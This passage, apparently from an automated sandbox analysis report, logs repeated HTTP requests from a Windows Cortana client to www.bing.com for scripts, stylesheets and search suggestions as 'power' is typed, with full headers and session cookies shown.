SRCHHPGUSR=IPMH=23077e13&IPMID=1741339061939&SRCHLANG=de&LUT=1741339061036&HV=1749241186&HVE=CfDJ8GtUudZcSi1Enm88WwQKtCevo8vohI1Bw9-SxmS08AD2YcqM5zkWNA--GnmldKufpkKnvg5sG08xXolbhHdb8OsvyogYLLrgWYTP7n8NJmqsPSOzA1Qq5RSl942HRObuxHJd5iOtsy5Ud0YBOs7irKDW4pIQ2EpxQ6nLeDGD4WEV; CortanaAppUID=646BA1FF24F806DFED4199E1E0EFF63E; MUIDB=5047E5942BB2460EA35B53CCF78DDB3D
                    Source: global trafficHTTP traffic detected: GET /rp/lA7OChSO-itFm5e9_qLjGL6O1QM.js HTTP/1.1host: www.bing.comaccept: */*referer: https://www.bing.com/AS/API/WindowsCortanaPane/V2/Initaccept-encoding: identityuser-agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Cortana 1.14.7.19041; 10.0.0.0.19045.2006) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/70.0.3538.102 Safari/537.36 Edge/18.19045cookie: MUID=5047E5942BB2460EA35B53CCF78DDB3D; _SS=SID=2B14B2771D29665F309CA7DF1CCC67E5&CBV=54277149&CPID=1741339061939&AC=1&CPH=6212fd11; _EDGE_S=SID=2B14B2771D29665F309CA7DF1CCC67E5&mkt=de-ch; SRCHUID=V=2&GUID=F82B2087A9384F33AD7BFBD2EB1DBFA2&dmnchg=1; SRCHD=AF=NOFORM; SRCHUSR=DOB=20250307&DS=1; SRCHHPGUSR=IPMH=23077e13&IPMID=1741339061939&SRCHLANG=de&LUT=1741339061036&HV=1749241186&HVE=CfDJ8GtUudZcSi1Enm88WwQKtCevo8vohI1Bw9-SxmS08AD2YcqM5zkWNA--GnmldKufpkKnvg5sG08xXolbhHdb8OsvyogYLLrgWYTP7n8NJmqsPSOzA1Qq5RSl942HRObuxHJd5iOtsy5Ud0YBOs7irKDW4pIQ2EpxQ6nLeDGD4WEV; CortanaAppUID=646BA1FF24F806DFED4199E1E0EFF63E; MUIDB=5047E5942BB2460EA35B53CCF78DDB3D
                    Source: global trafficHTTP traffic detected: GET /rp/nrn0gNK7unWcRwsjmQ63z4yrlgo.js HTTP/1.1host: www.bing.comaccept: */*referer: https://www.bing.com/AS/API/WindowsCortanaPane/V2/Initaccept-encoding: identityuser-agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Cortana 1.14.7.19041; 10.0.0.0.19045.2006) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/70.0.3538.102 Safari/537.36 Edge/18.19045cookie: MUID=5047E5942BB2460EA35B53CCF78DDB3D; _SS=SID=2B14B2771D29665F309CA7DF1CCC67E5&CBV=54277149&CPID=1741339061939&AC=1&CPH=6212fd11; _EDGE_S=SID=2B14B2771D29665F309CA7DF1CCC67E5&mkt=de-ch; SRCHUID=V=2&GUID=F82B2087A9384F33AD7BFBD2EB1DBFA2&dmnchg=1; SRCHD=AF=NOFORM; SRCHUSR=DOB=20250307&DS=1; SRCHHPGUSR=IPMH=23077e13&IPMID=1741339061939&SRCHLANG=de&LUT=1741339061036&HV=1749241186&HVE=CfDJ8GtUudZcSi1Enm88WwQKtCevo8vohI1Bw9-SxmS08AD2YcqM5zkWNA--GnmldKufpkKnvg5sG08xXolbhHdb8OsvyogYLLrgWYTP7n8NJmqsPSOzA1Qq5RSl942HRObuxHJd5iOtsy5Ud0YBOs7irKDW4pIQ2EpxQ6nLeDGD4WEV; CortanaAppUID=646BA1FF24F806DFED4199E1E0EFF63E; MUIDB=5047E5942BB2460EA35B53CCF78DDB3D
                    Source: global trafficHTTP traffic detected: GET /rp/oFjhPfAE6_U0PHIglZv0OCyOg2E.js HTTP/1.1host: www.bing.comaccept: */*referer: https://www.bing.com/AS/API/WindowsCortanaPane/V2/Initaccept-encoding: identityuser-agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Cortana 1.14.7.19041; 10.0.0.0.19045.2006) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/70.0.3538.102 Safari/537.36 Edge/18.19045cookie: MUID=5047E5942BB2460EA35B53CCF78DDB3D; _SS=SID=2B14B2771D29665F309CA7DF1CCC67E5&CBV=54277149&CPID=1741339061939&AC=1&CPH=6212fd11; _EDGE_S=SID=2B14B2771D29665F309CA7DF1CCC67E5&mkt=de-ch; SRCHUID=V=2&GUID=F82B2087A9384F33AD7BFBD2EB1DBFA2&dmnchg=1; SRCHD=AF=NOFORM; SRCHUSR=DOB=20250307&DS=1; SRCHHPGUSR=IPMH=23077e13&IPMID=1741339061939&SRCHLANG=de&LUT=1741339061036&HV=1749241186&HVE=CfDJ8GtUudZcSi1Enm88WwQKtCevo8vohI1Bw9-SxmS08AD2YcqM5zkWNA--GnmldKufpkKnvg5sG08xXolbhHdb8OsvyogYLLrgWYTP7n8NJmqsPSOzA1Qq5RSl942HRObuxHJd5iOtsy5Ud0YBOs7irKDW4pIQ2EpxQ6nLeDGD4WEV; CortanaAppUID=646BA1FF24F806DFED4199E1E0EFF63E; MUIDB=5047E5942BB2460EA35B53CCF78DDB3D
                    Source: global trafficHTTP traffic detected: GET /rp/pCYxgMw9oTm68Xg7OdrI9hylvf8.js HTTP/1.1host: www.bing.comaccept: */*referer: https://www.bing.com/AS/API/WindowsCortanaPane/V2/Initaccept-encoding: identityuser-agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Cortana 1.14.7.19041; 10.0.0.0.19045.2006) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/70.0.3538.102 Safari/537.36 Edge/18.19045cookie: MUID=5047E5942BB2460EA35B53CCF78DDB3D; _SS=SID=2B14B2771D29665F309CA7DF1CCC67E5&CBV=54277149&CPID=1741339061939&AC=1&CPH=6212fd11; _EDGE_S=SID=2B14B2771D29665F309CA7DF1CCC67E5&mkt=de-ch; SRCHUID=V=2&GUID=F82B2087A9384F33AD7BFBD2EB1DBFA2&dmnchg=1; SRCHD=AF=NOFORM; SRCHUSR=DOB=20250307&DS=1; SRCHHPGUSR=IPMH=23077e13&IPMID=1741339061939&SRCHLANG=de&LUT=1741339061036&HV=1749241186&HVE=CfDJ8GtUudZcSi1Enm88WwQKtCevo8vohI1Bw9-SxmS08AD2YcqM5zkWNA--GnmldKufpkKnvg5sG08xXolbhHdb8OsvyogYLLrgWYTP7n8NJmqsPSOzA1Qq5RSl942HRObuxHJd5iOtsy5Ud0YBOs7irKDW4pIQ2EpxQ6nLeDGD4WEV; CortanaAppUID=646BA1FF24F806DFED4199E1E0EFF63E; MUIDB=5047E5942BB2460EA35B53CCF78DDB3D
                    Source: global trafficHTTP traffic detected: GET /AS/API/WindowsCortanaPane/V2/Suggestions?qry=power&setlang=en-CH&cc=CH&nohs=1&qfm=1&cp=5&cvid=86443d64a1134c25ae43aa2af0a1dd45&ig=d2816d3781394865abf4e7a2b5b6cc43 HTTP/1.1host: www.bing.comreferer: https://www.bing.com/AS/API/WindowsCortanaPane/V2/Initaccept: */*accept-language: en-CHx-bm-clientfeatures: FontV22,LightAnswers,PreviewPaneAvailable,RevStorex-msedge-externalexp: d-thshld39,d-thshld42,d-thshld77,d-thshld78,d-thshldspcl40x-msedge-externalexptype: JointCoordaccept-encoding: identityuser-agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Cortana 1.14.7.19041; 10.0.0.0.19045.2006) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/70.0.3538.102 Safari/537.36 Edge/18.19045cookie: MUID=5047E5942BB2460EA35B53CCF78DDB3D; _SS=SID=2B14B2771D29665F309CA7DF1CCC67E5&CBV=54277149&CPID=1741339061939&AC=1&CPH=6212fd11; _EDGE_S=SID=2B14B2771D29665F309CA7DF1CCC67E5&mkt=de-ch; SRCHUID=V=2&GUID=F82B2087A9384F33AD7BFBD2EB1DBFA2&dmnchg=1; SRCHD=AF=NOFORM; SRCHUSR=DOB=20250307&DS=1; SRCHHPGUSR=IPMH=23077e13&IPMID=1741339061939&SRCHLANG=de&LUT=1741339061036&HV=1749241186&HVE=CfDJ8GtUudZcSi1Enm88WwQKtCevo8vohI1Bw9-SxmS08AD2YcqM5zkWNA--GnmldKufpkKnvg5sG08xXolbhHdb8OsvyogYLLrgWYTP7n8NJmqsPSOzA1Qq5RSl942HRObuxHJd5iOtsy5Ud0YBOs7irKDW4pIQ2EpxQ6nLeDGD4WEV; CortanaAppUID=646BA1FF24F806DFED4199E1E0EFF63E; MUIDB=5047E5942BB2460EA35B53CCF78DDB3D
                    Source: global trafficHTTP traffic detected: GET /AS/API/WindowsCortanaPane/V2/Suggestions?qry=pow&setlang=en-CH&cc=CH&nohs=1&qfm=1&cp=3&cvid=86443d64a1134c25ae43aa2af0a1dd45&ig=bf52853e220a4346aa4ac7abf63208da HTTP/1.1host: www.bing.comreferer: https://www.bing.com/AS/API/WindowsCortanaPane/V2/Initaccept: */*accept-language: en-CHx-bm-clientfeatures: FontV22,LightAnswers,PreviewPaneAvailable,RevStorex-msedge-externalexp: d-thshld39,d-thshld42,d-thshld77,d-thshld78,d-thshldspcl40x-msedge-externalexptype: JointCoordaccept-encoding: identityuser-agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Cortana 1.14.7.19041; 10.0.0.0.19045.2006) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/70.0.3538.102 Safari/537.36 Edge/18.19045cookie: MUID=5047E5942BB2460EA35B53CCF78DDB3D; _SS=SID=2B14B2771D29665F309CA7DF1CCC67E5&CBV=54277149&CPID=1741339061939&AC=1&CPH=6212fd11; _EDGE_S=SID=2B14B2771D29665F309CA7DF1CCC67E5&mkt=de-ch; SRCHUID=V=2&GUID=F82B2087A9384F33AD7BFBD2EB1DBFA2&dmnchg=1; SRCHD=AF=NOFORM; SRCHUSR=DOB=20250307&DS=1; SRCHHPGUSR=IPMH=23077e13&IPMID=1741339061939&SRCHLANG=de&LUT=1741339061036&HV=1749241186&HVE=CfDJ8GtUudZcSi1Enm88WwQKtCevo8vohI1Bw9-SxmS08AD2YcqM5zkWNA--GnmldKufpkKnvg5sG08xXolbhHdb8OsvyogYLLrgWYTP7n8NJmqsPSOzA1Qq5RSl942HRObuxHJd5iOtsy5Ud0YBOs7irKDW4pIQ2EpxQ6nLeDGD4WEV; CortanaAppUID=646BA1FF24F806DFED4199E1E0EFF63E; MUIDB=5047E5942BB2460EA35B53CCF78DDB3D
                    Source: global trafficHTTP traffic detected: GET /AS/API/WindowsCortanaPane/V2/Suggestions?qry=po&setlang=en-CH&cc=CH&nohs=1&qfm=1&cp=2&cvid=86443d64a1134c25ae43aa2af0a1dd45&ig=d356aec02cb04820a95d99e748c735cc HTTP/1.1host: www.bing.comreferer: https://www.bing.com/AS/API/WindowsCortanaPane/V2/Initaccept: */*accept-language: en-CHx-bm-clientfeatures: FontV22,LightAnswers,PreviewPaneAvailable,RevStorex-msedge-externalexp: d-thshld39,d-thshld42,d-thshld77,d-thshld78,d-thshldspcl40x-msedge-externalexptype: JointCoordaccept-encoding: identityuser-agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Cortana 1.14.7.19041; 10.0.0.0.19045.2006) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/70.0.3538.102 Safari/537.36 Edge/18.19045cookie: MUID=5047E5942BB2460EA35B53CCF78DDB3D; _SS=SID=2B14B2771D29665F309CA7DF1CCC67E5&CBV=54277149&CPID=1741339061939&AC=1&CPH=6212fd11; _EDGE_S=SID=2B14B2771D29665F309CA7DF1CCC67E5&mkt=de-ch; SRCHUID=V=2&GUID=F82B2087A9384F33AD7BFBD2EB1DBFA2&dmnchg=1; SRCHD=AF=NOFORM; SRCHUSR=DOB=20250307&DS=1; SRCHHPGUSR=IPMH=23077e13&IPMID=1741339061939&SRCHLANG=de&LUT=1741339061036&HV=1749241186&HVE=CfDJ8GtUudZcSi1Enm88WwQKtCevo8vohI1Bw9-SxmS08AD2YcqM5zkWNA--GnmldKufpkKnvg5sG08xXolbhHdb8OsvyogYLLrgWYTP7n8NJmqsPSOzA1Qq5RSl942HRObuxHJd5iOtsy5Ud0YBOs7irKDW4pIQ2EpxQ6nLeDGD4WEV; CortanaAppUID=646BA1FF24F806DFED4199E1E0EFF63E; MUIDB=5047E5942BB2460EA35B53CCF78DDB3D
                    Source: global trafficHTTP traffic detected: GET /AS/API/WindowsCortanaPane/V2/Suggestions?qry=powe&setlang=en-CH&cc=CH&nohs=1&qfm=1&cp=4&cvid=86443d64a1134c25ae43aa2af0a1dd45&ig=726cdd50aa9f41af99e41c68a3227071 HTTP/1.1host: www.bing.comreferer: https://www.bing.com/AS/API/WindowsCortanaPane/V2/Initaccept: */*accept-language: en-CHx-bm-clientfeatures: FontV22,LightAnswers,PreviewPaneAvailable,RevStorex-msedge-externalexp: d-thshld39,d-thshld42,d-thshld77,d-thshld78,d-thshldspcl40x-msedge-externalexptype: JointCoordaccept-encoding: identityuser-agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Cortana 1.14.7.19041; 10.0.0.0.19045.2006) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/70.0.3538.102 Safari/537.36 Edge/18.19045cookie: MUID=5047E5942BB2460EA35B53CCF78DDB3D; _SS=SID=2B14B2771D29665F309CA7DF1CCC67E5&CBV=54277149&CPID=1741339061939&AC=1&CPH=6212fd11; _EDGE_S=SID=2B14B2771D29665F309CA7DF1CCC67E5&mkt=de-ch; SRCHUID=V=2&GUID=F82B2087A9384F33AD7BFBD2EB1DBFA2&dmnchg=1; SRCHD=AF=NOFORM; SRCHUSR=DOB=20250307&DS=1; SRCHHPGUSR=IPMH=23077e13&IPMID=1741339061939&SRCHLANG=de&LUT=1741339061036&HV=1749241186&HVE=CfDJ8GtUudZcSi1Enm88WwQKtCevo8vohI1Bw9-SxmS08AD2YcqM5zkWNA--GnmldKufpkKnvg5sG08xXolbhHdb8OsvyogYLLrgWYTP7n8NJmqsPSOzA1Qq5RSl942HRObuxHJd5iOtsy5Ud0YBOs7irKDW4pIQ2EpxQ6nLeDGD4WEV; CortanaAppUID=646BA1FF24F806DFED4199E1E0EFF63E; MUIDB=5047E5942BB2460EA35B53CCF78DDB3D
                    Source: global trafficHTTP traffic detected: GET /AS/API/WindowsCortanaPane/V2/Suggestions?qry=p&setlang=en-CH&cc=CH&nohs=1&qfm=1&cp=1&cvid=86443d64a1134c25ae43aa2af0a1dd45&ig=fa08718e20a24ad08aee75bfd6419cb7 HTTP/1.1host: www.bing.comreferer: https://www.bing.com/AS/API/WindowsCortanaPane/V2/Initaccept: */*accept-language: en-CHx-bm-clientfeatures: FontV22,LightAnswers,PreviewPaneAvailable,RevStorex-msedge-externalexp: d-thshld39,d-thshld42,d-thshld77,d-thshld78,d-thshldspcl40x-msedge-externalexptype: JointCoordaccept-encoding: identityuser-agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Cortana 1.14.7.19041; 10.0.0.0.19045.2006) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/70.0.3538.102 Safari/537.36 Edge/18.19045cookie: MUID=5047E5942BB2460EA35B53CCF78DDB3D; _SS=SID=2B14B2771D29665F309CA7DF1CCC67E5&CBV=54277149&CPID=1741339061939&AC=1&CPH=6212fd11; _EDGE_S=SID=2B14B2771D29665F309CA7DF1CCC67E5&mkt=de-ch; SRCHUID=V=2&GUID=F82B2087A9384F33AD7BFBD2EB1DBFA2&dmnchg=1; SRCHD=AF=NOFORM; SRCHUSR=DOB=20250307&DS=1; SRCHHPGUSR=IPMH=23077e13&IPMID=1741339061939&SRCHLANG=de&LUT=1741339061036&HV=1749241186&HVE=CfDJ8GtUudZcSi1Enm88WwQKtCevo8vohI1Bw9-SxmS08AD2YcqM5zkWNA--GnmldKufpkKnvg5sG08xXolbhHdb8OsvyogYLLrgWYTP7n8NJmqsPSOzA1Qq5RSl942HRObuxHJd5iOtsy5Ud0YBOs7irKDW4pIQ2EpxQ6nLeDGD4WEV; CortanaAppUID=646BA1FF24F806DFED4199E1E0EFF63E; MUIDB=5047E5942BB2460EA35B53CCF78DDB3D
                    Source: global trafficHTTP traffic detected: GET /rp/pyuPhXK8l-xFBxa9DuSIQj-yyIc.js HTTP/1.1host: www.bing.comaccept: */*referer: https://www.bing.com/AS/API/WindowsCortanaPane/V2/Initaccept-encoding: identityuser-agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Cortana 1.14.7.19041; 10.0.0.0.19045.2006) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/70.0.3538.102 Safari/537.36 Edge/18.19045cookie: MUID=5047E5942BB2460EA35B53CCF78DDB3D; _SS=SID=2B14B2771D29665F309CA7DF1CCC67E5&CBV=54277149&CPID=1741339061939&AC=1&CPH=6212fd11; _EDGE_S=SID=2B14B2771D29665F309CA7DF1CCC67E5&mkt=de-ch; SRCHUID=V=2&GUID=F82B2087A9384F33AD7BFBD2EB1DBFA2&dmnchg=1; SRCHD=AF=NOFORM; SRCHUSR=DOB=20250307&DS=1; SRCHHPGUSR=IPMH=23077e13&IPMID=1741339061939&SRCHLANG=de&LUT=1741339061036&HV=1749241186&HVE=CfDJ8GtUudZcSi1Enm88WwQKtCevo8vohI1Bw9-SxmS08AD2YcqM5zkWNA--GnmldKufpkKnvg5sG08xXolbhHdb8OsvyogYLLrgWYTP7n8NJmqsPSOzA1Qq5RSl942HRObuxHJd5iOtsy5Ud0YBOs7irKDW4pIQ2EpxQ6nLeDGD4WEV; CortanaAppUID=646BA1FF24F806DFED4199E1E0EFF63E; MUIDB=5047E5942BB2460EA35B53CCF78DDB3D
                    Source: global trafficHTTP traffic detected: GET /rp/tBpXlF3sjMQG5dYd3N9wm6DnoIE.js HTTP/1.1host: www.bing.comaccept: */*referer: https://www.bing.com/AS/API/WindowsCortanaPane/V2/Initaccept-encoding: identityuser-agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Cortana 1.14.7.19041; 10.0.0.0.19045.2006) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/70.0.3538.102 Safari/537.36 Edge/18.19045cookie: MUID=5047E5942BB2460EA35B53CCF78DDB3D; _SS=SID=2B14B2771D29665F309CA7DF1CCC67E5&CBV=54277149&CPID=1741339061939&AC=1&CPH=6212fd11; _EDGE_S=SID=2B14B2771D29665F309CA7DF1CCC67E5&mkt=de-ch; SRCHUID=V=2&GUID=F82B2087A9384F33AD7BFBD2EB1DBFA2&dmnchg=1; SRCHD=AF=NOFORM; SRCHUSR=DOB=20250307&DS=1; SRCHHPGUSR=IPMH=23077e13&IPMID=1741339061939&SRCHLANG=de&LUT=1741339061036&HV=1749241186&HVE=CfDJ8GtUudZcSi1Enm88WwQKtCevo8vohI1Bw9-SxmS08AD2YcqM5zkWNA--GnmldKufpkKnvg5sG08xXolbhHdb8OsvyogYLLrgWYTP7n8NJmqsPSOzA1Qq5RSl942HRObuxHJd5iOtsy5Ud0YBOs7irKDW4pIQ2EpxQ6nLeDGD4WEV; CortanaAppUID=646BA1FF24F806DFED4199E1E0EFF63E; MUIDB=5047E5942BB2460EA35B53CCF78DDB3D
                    Source: global trafficHTTP traffic detected: GET /rp/tIcSGdw0KKZBXl-9dyaGHmf0tCY.js HTTP/1.1host: www.bing.comaccept: */*referer: https://www.bing.com/AS/API/WindowsCortanaPane/V2/Initaccept-encoding: identityuser-agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Cortana 1.14.7.19041; 10.0.0.0.19045.2006) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/70.0.3538.102 Safari/537.36 Edge/18.19045cookie: MUID=5047E5942BB2460EA35B53CCF78DDB3D; _SS=SID=2B14B2771D29665F309CA7DF1CCC67E5&CBV=54277149&CPID=1741339061939&AC=1&CPH=6212fd11; _EDGE_S=SID=2B14B2771D29665F309CA7DF1CCC67E5&mkt=de-ch; SRCHUID=V=2&GUID=F82B2087A9384F33AD7BFBD2EB1DBFA2&dmnchg=1; SRCHD=AF=NOFORM; SRCHUSR=DOB=20250307&DS=1; SRCHHPGUSR=IPMH=23077e13&IPMID=1741339061939&SRCHLANG=de&LUT=1741339061036&HV=1749241186&HVE=CfDJ8GtUudZcSi1Enm88WwQKtCevo8vohI1Bw9-SxmS08AD2YcqM5zkWNA--GnmldKufpkKnvg5sG08xXolbhHdb8OsvyogYLLrgWYTP7n8NJmqsPSOzA1Qq5RSl942HRObuxHJd5iOtsy5Ud0YBOs7irKDW4pIQ2EpxQ6nLeDGD4WEV; CortanaAppUID=646BA1FF24F806DFED4199E1E0EFF63E; MUIDB=5047E5942BB2460EA35B53CCF78DDB3D
                    Source: global trafficHTTP traffic detected: GET /rp/wfEXc3aEPq6rcYq0ZJTmJluzF0M.js HTTP/1.1host: www.bing.comaccept: */*referer: https://www.bing.com/AS/API/WindowsCortanaPane/V2/Initaccept-encoding: identityuser-agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Cortana 1.14.7.19041; 10.0.0.0.19045.2006) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/70.0.3538.102 Safari/537.36 Edge/18.19045cookie: MUID=5047E5942BB2460EA35B53CCF78DDB3D; _SS=SID=2B14B2771D29665F309CA7DF1CCC67E5&CBV=54277149&CPID=1741339061939&AC=1&CPH=6212fd11; _EDGE_S=SID=2B14B2771D29665F309CA7DF1CCC67E5&mkt=de-ch; SRCHUID=V=2&GUID=F82B2087A9384F33AD7BFBD2EB1DBFA2&dmnchg=1; SRCHD=AF=NOFORM; SRCHUSR=DOB=20250307&DS=1; SRCHHPGUSR=IPMH=23077e13&IPMID=1741339061939&SRCHLANG=de&LUT=1741339061036&HV=1749241186&HVE=CfDJ8GtUudZcSi1Enm88WwQKtCevo8vohI1Bw9-SxmS08AD2YcqM5zkWNA--GnmldKufpkKnvg5sG08xXolbhHdb8OsvyogYLLrgWYTP7n8NJmqsPSOzA1Qq5RSl942HRObuxHJd5iOtsy5Ud0YBOs7irKDW4pIQ2EpxQ6nLeDGD4WEV; CortanaAppUID=646BA1FF24F806DFED4199E1E0EFF63E; MUIDB=5047E5942BB2460EA35B53CCF78DDB3D
                    Source: global trafficHTTP traffic detected: GET /AS/API/WindowsCortanaPane/V2/Suggestions?qry=powers&setlang=en-CH&cc=CH&nohs=1&qfm=1&cp=6&cvid=86443d64a1134c25ae43aa2af0a1dd45&ig=59214347d6454a08a0fe303b473b2103 HTTP/1.1host: www.bing.comreferer: https://www.bing.com/AS/API/WindowsCortanaPane/V2/Initaccept: */*accept-language: en-CHx-agent-deviceid: 01000A4109009A83x-bm-cbt: 1749241229x-bm-clientfeatures: FontV22,LightAnswers,PreviewPaneAvailable,RevStorex-bm-dateformat: dd/MM/yyyyx-bm-devicedimensions: 784x640x-bm-devicedimensionslogical: 784x640x-bm-devicescale: 100x-bm-dtz: -240x-bm-market: CHx-bm-theme: 000000;0078d7x-bm-windowsflights: FX:119E26AD,FX:11C0E96C,FX:11C6E5C2,FX:11C7EB6A,FX:11C9408A,FX:11C940DB,FX:11CB9A9F,FX:11CB9AC1,FX:11CC111C,FX:11D5BFCD,FX:11DF5B12,FX:11DF5B75,FX:1240931B,FX:124117A5,FX:124B38D0,FX:127FC878,FX:1283FFE8,FX:12840617,FX:128979F9,FX:128EBD7E,FX:129135BB,FX:129E053F,FX:12A74DB5,FX:12AB734D,FX:12B8450E,FX:12BD6E73,FX:12C3331B,FX:12C7D66E,FX:12CDE644,FX:12D1574C,FX:12D281C4,FX:12E8312D,FX:12E85C75x-device-clientsession: 3C11BD259BCE4B7C8335017418A20558x-device-isoptin: falsex-device-machineid: {92C86F7C-DB2B-4F6A-95AD-98B4A2AE008A}x-device-ossku: 48x-device-touch: falsex-deviceid: 01000A4109009A83x-msedge-externalexp: d-thshld39,d-thshld42,d-thshld77,d-thshld78,d-thshldspcl40x-msedge-externalexptype: JointCoordx-positionertype: Desktopx-search-appid: Microsoft.Windows.Cortana_cw5n1h2txyewy!CortanaU
                    Source: global trafficHTTP traffic detected: GET /rp/x_3qvwDia52Yk8BT-lka6wZS3R4.js HTTP/1.1host: www.bing.comaccept: */*referer: https://www.bing.com/AS/API/WindowsCortanaPane/V2/Initaccept-encoding: identityuser-agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Cortana 1.14.7.19041; 10.0.0.0.19045.2006) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/70.0.3538.102 Safari/537.36 Edge/18.19045cookie: MUID=5047E5942BB2460EA35B53CCF78DDB3D; _SS=SID=2B14B2771D29665F309CA7DF1CCC67E5&CBV=54277149&CPID=1741339061939&AC=1&CPH=6212fd11; _EDGE_S=SID=2B14B2771D29665F309CA7DF1CCC67E5&mkt=de-ch; SRCHUID=V=2&GUID=F82B2087A9384F33AD7BFBD2EB1DBFA2&dmnchg=1; SRCHD=AF=NOFORM; SRCHUSR=DOB=20250307&DS=1; SRCHHPGUSR=IPMH=23077e13&IPMID=1741339061939&SRCHLANG=de&LUT=1741339061036&HV=1749241186&HVE=CfDJ8GtUudZcSi1Enm88WwQKtCevo8vohI1Bw9-SxmS08AD2YcqM5zkWNA--GnmldKufpkKnvg5sG08xXolbhHdb8OsvyogYLLrgWYTP7n8NJmqsPSOzA1Qq5RSl942HRObuxHJd5iOtsy5Ud0YBOs7irKDW4pIQ2EpxQ6nLeDGD4WEV; CortanaAppUID=646BA1FF24F806DFED4199E1E0EFF63E; MUIDB=5047E5942BB2460EA35B53CCF78DDB3D
                    Source: global trafficHTTP traffic detected: GET /th?id=OSK.f61d5e24b78d16ddc943170b8fc16e54&w=80&h=80&qlt=90&c=6&rs=1&cdv=1&pid=RS HTTP/1.1host: www.bing.comreferer: https://www.bing.com/AS/API/WindowsCortanaPane/V2/Initaccept: image/png,image/svg+xml,image/*;q=0.8,*/*;q=0.5accept-language: en-CHaccept-encoding: identityuser-agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Cortana 1.14.7.19041; 10.0.0.0.19045.2006) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/70.0.3538.102 Safari/537.36 Edge/18.19045cookie: MUID=5047E5942BB2460EA35B53CCF78DDB3D; _SS=SID=2B14B2771D29665F309CA7DF1CCC67E5&CBV=54277149&CPID=1741339061939&AC=1&CPH=6212fd11; _EDGE_S=SID=2B14B2771D29665F309CA7DF1CCC67E5&mkt=de-ch; SRCHUID=V=2&GUID=F82B2087A9384F33AD7BFBD2EB1DBFA2&dmnchg=1; SRCHD=AF=NOFORM; SRCHUSR=DOB=20250307&DS=1; SRCHHPGUSR=IPMH=23077e13&IPMID=1741339061939&SRCHLANG=de&LUT=1741339061036&HV=1749241186&HVE=CfDJ8GtUudZcSi1Enm88WwQKtCevo8vohI1Bw9-SxmS08AD2YcqM5zkWNA--GnmldKufpkKnvg5sG08xXolbhHdb8OsvyogYLLrgWYTP7n8NJmqsPSOzA1Qq5RSl942HRObuxHJd5iOtsy5Ud0YBOs7irKDW4pIQ2EpxQ6nLeDGD4WEV; CortanaAppUID=646BA1FF24F806DFED4199E1E0EFF63E; MUIDB=5047E5942BB2460EA35B53CCF78DDB3D
                    Source: global trafficHTTP traffic detected: GET /rp/zndPBVydyQ6eRKaiC_BVZLXnAIU.js HTTP/1.1host: www.bing.comaccept: */*referer: https://www.bing.com/AS/API/WindowsCortanaPane/V2/Initaccept-encoding: identityuser-agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Cortana 1.14.7.19041; 10.0.0.0.19045.2006) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/70.0.3538.102 Safari/537.36 Edge/18.19045cookie: MUID=5047E5942BB2460EA35B53CCF78DDB3D; _SS=SID=2B14B2771D29665F309CA7DF1CCC67E5&CBV=54277149&CPID=1741339061939&AC=1&CPH=6212fd11; _EDGE_S=SID=2B14B2771D29665F309CA7DF1CCC67E5&mkt=de-ch; SRCHUID=V=2&GUID=F82B2087A9384F33AD7BFBD2EB1DBFA2&dmnchg=1; SRCHD=AF=NOFORM; SRCHUSR=DOB=20250307&DS=1; SRCHHPGUSR=IPMH=23077e13&IPMID=1741339061939&SRCHLANG=de&LUT=1741339061036&HV=1749241186&HVE=CfDJ8GtUudZcSi1Enm88WwQKtCevo8vohI1Bw9-SxmS08AD2YcqM5zkWNA--GnmldKufpkKnvg5sG08xXolbhHdb8OsvyogYLLrgWYTP7n8NJmqsPSOzA1Qq5RSl942HRObuxHJd5iOtsy5Ud0YBOs7irKDW4pIQ2EpxQ6nLeDGD4WEV; CortanaAppUID=646BA1FF24F806DFED4199E1E0EFF63E; MUIDB=5047E5942BB2460EA35B53CCF78DDB3D
                    Source: global trafficHTTP traffic detected: GET /rs/2d/3t/cir3,ortl,cc,nc/HTtwxidvByGPeR1IbVBmzc6JMFE.css?or=w HTTP/1.1host: www.bing.comaccept: */*referer: https://www.bing.com/AS/API/WindowsCortanaPane/V2/Initaccept-encoding: identityuser-agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Cortana 1.14.7.19041; 10.0.0.0.19045.2006) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/70.0.3538.102 Safari/537.36 Edge/18.19045cookie: MUID=5047E5942BB2460EA35B53CCF78DDB3D; _SS=SID=2B14B2771D29665F309CA7DF1CCC67E5&CBV=54277149&CPID=1741339061939&AC=1&CPH=6212fd11; _EDGE_S=SID=2B14B2771D29665F309CA7DF1CCC67E5&mkt=de-ch; SRCHUID=V=2&GUID=F82B2087A9384F33AD7BFBD2EB1DBFA2&dmnchg=1; SRCHD=AF=NOFORM; SRCHUSR=DOB=20250307&DS=1; 